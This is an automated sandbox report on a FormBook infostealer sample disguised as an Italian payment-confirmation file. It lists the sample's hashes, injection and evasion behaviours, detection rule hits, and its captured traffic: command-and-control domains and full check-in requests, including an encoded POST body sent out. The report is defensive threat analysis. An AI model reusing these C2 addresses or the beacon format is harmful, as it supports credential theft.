Joe Sandbox Cloud Basic Analysis Report
Create Interactive Tour

Windows Analysis Report
LETTERA DI CONFERMA DEL PAGAMENTO.exe

Overview

General Information

Sample name:LETTERA DI CONFERMA DEL PAGAMENTO.exe
Analysis ID:1651192
MD5:a5550246c73f30ed5fd68bb236675d46
SHA1:38eb7760ece55dcdd8943376da40f446bc9469d4
SHA256:60727aaf2a23d1760c52945ee9b3fa1b39f155ff6ebf98b38a170fba58a6fdde
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w7x64
  • LETTERA DI CONFERMA DEL PAGAMENTO.exe (PID: 3460 cmdline: "C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exe" MD5: A5550246C73F30ED5FD68BB236675D46)
    • svchost.exe (PID: 3500 cmdline: "C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exe" MD5: 54A47F6B5E09A77E61649109C6A08866)
      • rGdWid9z.exe (PID: 1376 cmdline: "C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\rGdWid9z.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • net1.exe (PID: 3596 cmdline: "C:\Windows\SysWOW64\net1.exe" MD5: 2041012726EF7C95ED51C15C56545A7F)
          • BupJjuMCJB.exe (PID: 1224 cmdline: "C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 3796 cmdline: "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe" MD5: C2D924CE9EA2EE3E7B7E6A7C476619CA)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.419495871.0000000000290000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.626895631.00000000001E0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.419524838.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000004.00000002.626885310.0000000000190000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000005.00000002.626989631.0000000000560000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Sigma Signatures

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exe", CommandLine: "C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exe", ParentImage: C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exe, ParentProcessId: 3460, ParentProcessName: LETTERA DI CONFERMA DEL PAGAMENTO.exe, ProcessCommandLine: "C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exe", ProcessId: 3500, ProcessName: svchost.exe
            Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\net1.exe, ProcessId: 3596, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exe", CommandLine: "C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exe", ParentImage: C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exe, ParentProcessId: 3460, ParentProcessName: LETTERA DI CONFERMA DEL PAGAMENTO.exe, ProcessCommandLine: "C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exe", ProcessId: 3500, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-28T14:34:29.143161+010028554651A Network Trojan was detected192.168.2.224916176.223.54.14680TCP
            2025-03-28T14:34:52.415151+010028554651A Network Trojan was detected192.168.2.2249166199.59.243.22880TCP
            2025-03-28T14:35:06.169577+010028554651A Network Trojan was detected192.168.2.2249170104.21.94.16280TCP
            2025-03-28T14:35:28.552724+010028554651A Network Trojan was detected192.168.2.224917476.223.54.14680TCP
            2025-03-28T14:35:42.174753+010028554651A Network Trojan was detected192.168.2.2249178104.26.0.17780TCP
            2025-03-28T14:35:55.898526+010028554651A Network Trojan was detected192.168.2.2249182162.254.38.21780TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-28T14:34:44.481409+010028554641A Network Trojan was detected192.168.2.2249163199.59.243.22880TCP
            2025-03-28T14:34:47.134993+010028554641A Network Trojan was detected192.168.2.2249164199.59.243.22880TCP
            2025-03-28T14:34:49.779989+010028554641A Network Trojan was detected192.168.2.2249165199.59.243.22880TCP
            2025-03-28T14:34:57.748698+010028554641A Network Trojan was detected192.168.2.2249167104.21.94.16280TCP
            2025-03-28T14:35:00.698441+010028554641A Network Trojan was detected192.168.2.2249168104.21.94.16280TCP
            2025-03-28T14:35:03.163808+010028554641A Network Trojan was detected192.168.2.2249169104.21.94.16280TCP
            2025-03-28T14:35:11.531265+010028554641A Network Trojan was detected192.168.2.224917176.223.54.14680TCP
            2025-03-28T14:35:14.210408+010028554641A Network Trojan was detected192.168.2.224917276.223.54.14680TCP
            2025-03-28T14:35:16.849195+010028554641A Network Trojan was detected192.168.2.224917376.223.54.14680TCP
            2025-03-28T14:35:33.908477+010028554641A Network Trojan was detected192.168.2.2249175104.26.0.17780TCP
            2025-03-28T14:35:36.802944+010028554641A Network Trojan was detected192.168.2.2249176104.26.0.17780TCP
            2025-03-28T14:35:39.541370+010028554641A Network Trojan was detected192.168.2.2249177104.26.0.17780TCP
            2025-03-28T14:35:47.669116+010028554641A Network Trojan was detected192.168.2.2249179162.254.38.21780TCP
            2025-03-28T14:35:50.483604+010028554641A Network Trojan was detected192.168.2.2249180162.254.38.21780TCP
            2025-03-28T14:35:53.178570+010028554641A Network Trojan was detected192.168.2.2249181162.254.38.21780TCP

            Joe Sandbox Signatures

            • AV Detection
            • Compliance
            • Networking
            • E-Banking Fraud
            • System Summary
            • Data Obfuscation
            • Persistence and Installation Behavior
            • Hooking and other Techniques for Hiding and Protection
            • Malware Analysis System Evasion
            • Anti Debugging
            • HIPS / PFW / Operating System Protection Evasion
            • Language, Device and Operating System Detection
            • Stealing of Sensitive Information
            • Remote Access Functionality

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: http://www.viatotor.cfd/awht/?Up5Dxd=8WWHC7wWqzabLylEqC4h4xSUa5Q1ERPluRInRnvP6aHLJY6FsD1in5Ba6ce0RJeZH7zN6VIqS0duX3wRoykHaMJocpJ8Lyik8tyRvKfKAYeOrifkhUVyVr4B9LR1&RtRt=H2TxDP-0yxAvira URL Cloud: Label: malware
            Source: http://www.viatotor.cfd/awht/Avira URL Cloud: Label: malware
            Source: http://www.777assistant.xyz/s1k7/?RtRt=H2TxDP-0yx&Up5Dxd=zKlqO7QNcfetDPpTJRNWr1IyWy9Pz553WMXns1xrbNYpuLFGGplxzK50t++Wm/Dpu5XCEj5cJoLsJvwgvv1H2BlHGmx6spHmojpwT52SXD2CVd9QciE69D6Wx6EdAvira URL Cloud: Label: malware
            Source: LETTERA DI CONFERMA DEL PAGAMENTO.exeVirustotal: Detection: 42%Perma Link
            Source: Yara matchFile source: 00000002.00000002.419495871.0000000000290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.626895631.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.419524838.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.626885310.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.626989631.0000000000560000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.626861797.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.481410737.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.419614314.0000000001FB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.627085177.0000000003E60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Submited SampleNeural Call Log Analysis: 83.8%
            Source: LETTERA DI CONFERMA DEL PAGAMENTO.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: net1.pdb source: svchost.exe, 00000002.00000002.419501407.0000000000346000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.419501407.0000000000324000.00000004.00000020.00020000.00000000.sdmp, rGdWid9z.exe, 00000003.00000002.626998389.0000000000940000.00000004.00000020.00020000.00000000.sdmp, rGdWid9z.exe, 00000003.00000002.626998389.0000000000914000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: LETTERA DI CONFERMA DEL PAGAMENTO.exe, 00000000.00000003.355344717.0000000002A60000.00000004.00001000.00020000.00000000.sdmp, LETTERA DI CONFERMA DEL PAGAMENTO.exe, 00000000.00000003.354380243.0000000002C90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.401261747.00000000005B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.419535822.0000000000740000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.419535822.00000000008C0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.400899262.0000000000450000.00000004.00000020.00020000.00000000.sdmp, net1.exe, 00000004.00000003.419809000.00000000008D0000.00000004.00000020.00020000.00000000.sdmp, net1.exe, 00000004.00000002.627106356.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, net1.exe, 00000004.00000002.627106356.0000000000BE0000.00000040.00001000.00020000.00000000.sdmp, net1.exe, 00000004.00000003.419508364.0000000000760000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: net1.pdbN source: svchost.exe, 00000002.00000002.419501407.0000000000346000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.419501407.0000000000324000.00000004.00000020.00020000.00000000.sdmp, rGdWid9z.exe, 00000003.00000002.626998389.0000000000940000.00000004.00000020.00020000.00000000.sdmp, rGdWid9z.exe, 00000003.00000002.626998389.0000000000914000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: net1.exe, 00000004.00000002.627315561.000000000130C000.00000004.10000000.00040000.00000000.sdmp, net1.exe, 00000004.00000002.626998866.000000000068C000.00000004.00000020.00020000.00000000.sdmp, BupJjuMCJB.exe, 00000005.00000002.627266394.000000000307C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.482046973.00000000015AC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: rGdWid9z.exe, 00000003.00000002.626883011.000000000020F000.00000002.00000001.01000000.00000004.sdmp, BupJjuMCJB.exe, 00000005.00000002.627216674.000000000104F000.00000002.00000001.01000000.00000005.sdmp

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49163 -> 199.59.243.228:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49175 -> 104.26.0.177:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49171 -> 76.223.54.146:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49169 -> 104.21.94.162:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49177 -> 104.26.0.177:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49181 -> 162.254.38.217:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49176 -> 104.26.0.177:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49173 -> 76.223.54.146:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49166 -> 199.59.243.228:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49164 -> 199.59.243.228:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49165 -> 199.59.243.228:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49172 -> 76.223.54.146:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49161 -> 76.223.54.146:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49170 -> 104.21.94.162:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49179 -> 162.254.38.217:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49182 -> 162.254.38.217:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49168 -> 104.21.94.162:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49167 -> 104.21.94.162:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49174 -> 76.223.54.146:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49180 -> 162.254.38.217:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49178 -> 104.26.0.177:80
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeDNS query: www.777assistant.xyz
            Source: DNS query: www.031232899.xyz
            Source: Joe Sandbox ViewIP Address: 45.33.6.223 45.33.6.223
            Source: Joe Sandbox ViewIP Address: 76.223.54.146 76.223.54.146
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: C:\Windows\SysWOW64\net1.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sqlite-dll-win32-x86-3360000[1].zipJump to behavior
            Source: global trafficHTTP traffic detected: GET /s1k7/?RtRt=H2TxDP-0yx&Up5Dxd=zKlqO7QNcfetDPpTJRNWr1IyWy9Pz553WMXns1xrbNYpuLFGGplxzK50t++Wm/Dpu5XCEj5cJoLsJvwgvv1H2BlHGmx6spHmojpwT52SXD2CVd9QciE69D6Wx6Ed HTTP/1.1Host: www.777assistant.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /2021/sqlite-dll-win32-x86-3360000.zip HTTP/1.1User-Agent: Mozilla/5.0 (Linux; Android 5.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36Host: www.sqlite.orgConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /j7vq/?Up5Dxd=Bcl9cp41dlHcDC4N7AFqYtSrkG8XSNj0Dw08raKVYGNnS8Fk0dwOiPOkXhtRLsFmQzGgwtyTAOUIspu4tmMliVEfuoO5YMFyI/UM7bEFhyYTRsu/qMC3INXijMdt&RtRt=H2TxDP-0yx HTTP/1.1Host: www.hypehike.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /awht/?Up5Dxd=8WWHC7wWqzabLylEqC4h4xSUa5Q1ERPluRInRnvP6aHLJY6FsD1in5Ba6ce0RJeZH7zN6VIqS0duX3wRoykHaMJocpJ8Lyik8tyRvKfKAYeOrifkhUVyVr4B9LR1&RtRt=H2TxDP-0yx HTTP/1.1Host: www.viatotor.cfdAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /tskx/?Up5Dxd=3FZsyYtvHJrwTHHvKE69JLGDZnzKmCnrMuqRAlJnKL7t2F6wJjOvapVJjCl/gRiWQVTLflE3WPZwa5xfwkUpPmC6JxN15cgxThe6GU7HJW2U+NF71xQUQBXCRD3d&RtRt=H2TxDP-0yx HTTP/1.1Host: www.ambitiouswomen.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /3lf9/?Up5Dxd=5GxzxjzYtuQVaXKi96wJQlL5jVVVED3gsqLy8xSnFJL9Njv/LCMj1519KCJv/YXWDbEHwXyFpdS6CdsXIHJjWfKOpLe5XFlJMx8QFerMn32IswyHn8LLdrliT4lw&RtRt=H2TxDP-0yx HTTP/1.1Host: www.morpakampus.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /qmo0/?Up5Dxd=s/riq2Gjc84WkOXIPYK3MDRDBcdtSPFB6JhYX0OHrW5JrEb3J4m1Tdn1DtTVCNN6q5y0/nExmx/pVjwhpLktH0ipuaSv5IUB3fbV39kfxE7kNJsXW33X5BidtZsd&RtRt=H2TxDP-0yx HTTP/1.1Host: www.streartex.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.777assistant.xyz
            Source: global trafficDNS traffic detected: DNS query: www.sqlite.org
            Source: global trafficDNS traffic detected: DNS query: www.hypehike.buzz
            Source: global trafficDNS traffic detected: DNS query: www.viatotor.cfd
            Source: global trafficDNS traffic detected: DNS query: www.ambitiouswomen.net
            Source: global trafficDNS traffic detected: DNS query: www.morpakampus.com
            Source: global trafficDNS traffic detected: DNS query: www.streartex.live
            Source: global trafficDNS traffic detected: DNS query: www.031232899.xyz
            Source: unknownHTTP traffic detected: POST /j7vq/ HTTP/1.1Host: www.hypehike.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Length: 2163Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedOrigin: http://www.hypehike.buzzReferer: http://www.hypehike.buzz/j7vq/User-Agent: Mozilla/5.0 (Linux; Android 5.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36Data Raw: 55 70 35 44 78 64 3d 4d 65 4e 64 66 66 4d 4e 52 56 66 43 4e 53 73 62 75 68 49 7a 50 38 6d 56 70 33 73 33 51 2b 71 32 4d 43 49 57 71 72 79 6c 44 6c 6c 64 46 4f 38 4f 70 64 51 64 72 4c 4c 78 4f 41 64 6d 44 37 6c 69 4c 52 37 77 35 34 6d 58 61 74 30 55 6a 37 36 67 6d 57 45 4f 6a 58 35 6c 6c 5a 2b 6b 51 2f 35 73 59 4c 64 74 36 71 34 75 39 57 35 7a 56 76 2f 6a 2b 64 61 4f 4d 35 4c 49 77 34 74 6f 32 66 54 55 30 56 54 52 76 4c 43 43 32 39 72 31 59 34 70 47 72 58 51 57 49 4e 67 75 30 63 6b 4a 5a 76 35 65 63 47 59 53 4f 77 6e 37 73 52 6b 2f 63 79 61 46 37 33 6e 39 76 68 4f 59 6c 52 59 68 47 38 53 76 6f 37 58 6c 2f 73 78 62 34 6b 48 2b 79 78 31 41 4a 49 77 62 35 44 4c 6f 31 53 58 50 6a 6e 2b 6a 69 50 55 67 62 51 53 34 64 6f 62 5a 4d 36 67 38 44 56 4e 33 4a 37 4b 72 57 4d 74 34 44 71 2f 62 72 6a 66 54 48 64 68 36 69 6f 31 76 72 6a 76 45 45 69 54 64 6c 70 6b 39 6c 71 6d 6a 59 65 74 62 6f 69 5a 70 65 6e 42 43 6c 2b 34 49 43 65 52 53 55 33 6f 69 68 56 4b 68 47 6c 78 44 58 72 62 73 59 46 49 74 55 6a 66 70 6b 33 47 64 6d 67 42 70 4b 4c 76 59 56 62 72 62 36 52 59 44 30 48 67 7a 69 5a 52 6c 6e 52 69 47 6a 36 6a 61 6c 6d 4c 38 6d 4e 33 4e 4f 66 63 4c 63 73 4b 4e 66 6c 6c 42 74 4f 4e 70 7a 4f 51 55 61 63 43 78 6a 67 59 33 71 34 64 4a 30 79 61 51 65 69 46 6a 56 61 5a 65 6b 6a 76 4c 35 37 57 38 58 42 54 50 33 6b 70 44 55 35 73 44 51 35 54 6e 43 6a 79 53 64 2f 62 47 35 2b 70 76 2b 77 39 69 4f 67 37 63 33 71 65 56 74 45 71 4f 77 70 78 71 53 75 51 6e 73 2b 55 70 62 74 76 6b 41 50 70 62 72 31 67 70 31 43 41 58 71 35 59 77 55 48 6e 42 6a 7a 74 56 6e 59 76 67 53 4e 6c 66 67 4e 4c 39 6a 43 73 47 4f 48 50 4d 4f 6c 37 36 6c 78 38 61 5a 46 5a 59 4c 50 4f 4b 2b 76 56 70 37 5a 6c 54 38 31 64 72 57 55 36 62 2b 45 73 33 48 4d 51 65 42 65 6e 5a 36 7a 54 55 66 39 4e 72 2f 59 79 4b 71 30 37 50 59 44 6a 31 67 75 36 6f 55 51 39 67 36 7a 53 6e 4b 6e 48 39 43 6c 56 36 30 55 45 69 2f 36 49 63 63 4f 54 79 32 4a 43 76 70 49 56 42 6c 42 31 63 4f 31 66 57 33 4e 41 74 46 33 65 72 5a 79 30 48 39 51 75 42 73 61 5a 30 59 49 64 42 5a 64 69 64 7a 74 41 31 50 31 78 6a 58 74 71 58 58 4b 68 54 39 63 43 4f 47 4f 67 73 76 47 77 47 4f 6b 63 38 6a 74 73 73 48 7a 4a 2f 78 45 5a 39 64 43 73 35 62 6a 48 76 6f 32 41 70 77 35 46 58 39 44 68 4a 58 32 77 65 51 5a 76 73 6a 37 64 57 36 44 54 62 6e 4f 69 6f 73 76 44 4e 6b 35 36 72 43 58 41 52 7a 42 41 49 4b 69 37 76 6b 67 70 35 37 47 41 75 64 5a 46 4f 7a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Mar 2025 13:34:57 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=43y23FhKx79Gk16HcoYUbnuqadjuX8whiep9DOCDqR3mgSDao2WnIh7jBusw47EZ9kysiupWnHhla75mdBLPbQyMUWbh3gzkpY6I3k3TxOXLr9a9sYYr2x4wbRU3O3e%2FDlKU"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9277820aa9dd0f59-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: 